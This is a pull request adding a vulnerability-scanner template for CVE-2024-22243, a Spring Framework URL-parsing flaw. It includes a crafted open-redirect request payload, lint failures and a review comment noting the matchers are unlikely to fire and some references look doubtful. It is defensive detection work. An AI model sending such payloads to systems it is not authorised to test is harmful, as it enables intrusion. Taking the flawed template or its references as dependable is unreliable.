Added template for CVE-2024-22243 #11377

Open: wants to merge 1 commit into base: main
56 changes: 56 additions & 0 deletions CVE-2024-22243.yaml
@@ -0,0 +1,56 @@
id: CVE-2024-22243
info:
name: URL Parsing Vulnerability in Java Spring Framework
author: Sean Pesce
severity: high
description: |
A URL-parsing vulnerability in the Java Spring Framework that affects certain versions.
This issue arises from a specific regex in the UriComponentsBuilder class, leading to
unexpected host name extraction. This can cause security flaws like open redirects or
SSRF if trusted host names are used for authorization.
remediation: |
Upgrade to a patched version of the Spring Framework where this vulnerability is resolved.
Avoid using the vulnerable methods for parsing URLs, or implement custom validation to
ensure the host name extracted is as expected. Regularly review and update dependencies to

Check failure on line 14 in CVE-2024-22243.yaml (GitHub Actions / lint): 14:95 [trailing-spaces] trailing spaces
prevent such vulnerabilities.
reference:
- https://github.com/spring-projects/spring-framework/issues/22243
- https://security.netapp.com/advisory/ntap-20240524-0001/
- https://spring.io/security/cve-2024-22243
- http://seclists.org/fulldisclosure/2024/Sep/24
- https://github.com/hinat0y/Dataset1
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
cvss-score: 8.1
cve-id: CVE-2024-22243
cwe-id: CWE-601
epss-score: 0.00061
epss-percentile: 0.27896

http:
- raw:
- |
GET /redirect?url=http://attacker%[email protected]/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
part: header
words:
- "Location: http://attacker%[email protected]/"
- type: regex
part: body
regex:
- "http://victim.com" # Detects the incorrect parsing of the host name
- type: word
part: header
words:
- "Location: http://" # Matching any external redirection URL pattern
- type: word
part: header
words:
- "Location: http://attacker%5Bexample.com@" # Specifically targeting crafted attacker URL
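Review bot: With `matchers-condition: and`, all five matchers must hold at once, and the `regex` matcher on `part: body` for "http://victim.com" will rarely be true for a 302 response, so the template is unlikely to ever fire; drop that matcher or move the check to the `Location` header. The `word` matcher for "Location: http://" is redundant next to the two more specific `Location` matchers, and the dot in the regex is unescaped. The request also hardcodes `/redirect?url=`, an endpoint the target may not expose, and a reflected `Location` value shows only that the application redirects to user-supplied input, not that `UriComponentsBuilder` extracted the wrong host, so the template should state which path it assumes or make the path configurable. In `info`, the remediation text needs its trailing spaces removed (the lint failure at 14:95), the description should name the affected versions instead of "certain versions", and the first reference's issue number equals the CVE's numeric part, so confirm that it and the Dataset1 link actually document this issue.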

Check failure on line 56 in CVE-2024-22243.yaml (GitHub Actions / lint): 56:1 [empty-lines] too many blank lines (1 > 0)